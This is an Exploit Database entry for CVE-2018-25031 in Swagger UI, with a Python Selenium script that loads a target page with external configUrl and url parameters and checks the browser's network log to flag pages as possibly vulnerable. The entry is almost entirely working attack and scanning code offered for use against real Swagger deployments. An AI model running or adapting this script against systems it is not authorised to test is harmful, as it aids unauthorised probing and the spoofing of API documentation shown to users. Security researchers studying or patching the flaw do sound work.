Swagger UI 4.1.3 – User Interface (UI) Misrepresentation of Critical Information

• Exploit Database
• 121 阅读

• 作者： Rafael Cintra Lopes
  日期： 2023-04-20
• 类别：

  • webapps
  平台：

  • json
• 来源：https://www.exploit-db.com/exploits/51379/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76

  # Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information # Date: 14 April, 2023 # Exploit Author: Rafael Cintra Lopes # Vendor Homepage: https://swagger.io/ # Version: < 4.1.3 # CVE: CVE-2018-25031 # Site: https://rafaelcintralopes.com.br/   # Usage: python swagger-exploit.py https://[swagger-page].com   from selenium import webdriver from selenium.webdriver.common.desired_capabilities import DesiredCapabilities from selenium.webdriver.chrome.service import Service import time import json import sys   if __name__ == "__main__":   target = sys.argv[1]   desired_capabilities = DesiredCapabilities.CHROME desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"}   options = webdriver.ChromeOptions() options.add_argument("--headless") options.add_argument("--ignore-certificate-errors") options.add_argument("--log-level=3") options.add_experimental_option("excludeSwitches", ["enable-logging"])   # Browser webdriver path drive_service = Service("C:/chromedriver.exe")   driver = webdriver.Chrome(service=drive_service, options=options, desired_capabilities=desired_capabilities)   driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json") time.sleep(10) driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json") time.sleep(10)   logs = driver.get_log("performance")   with open("log_file.json", "w", encoding="utf-8") as f: f.write("[")   for log in logs: log_file = json.loads(log["message"])["message"]   if("Network.response" in log_file["method"] or "Network.request" in log_file["method"] or "Network.webSocket" in log_file["method"]):   f.write(json.dumps(log_file)+",") f.write("{}]")   driver.quit()   json_file_path = "log_file.json" with open(json_file_path, "r", encoding="utf-8") as f: logs = json.loads(f.read())   for log in logs: try: url = log["params"]["request"]["url"]   if(url == "https://petstore.swagger.io/v2/hacked1.json"): print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json") if(url == "https://petstore.swagger.io/v2/hacked2.json"): print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")   except Exception as e: pass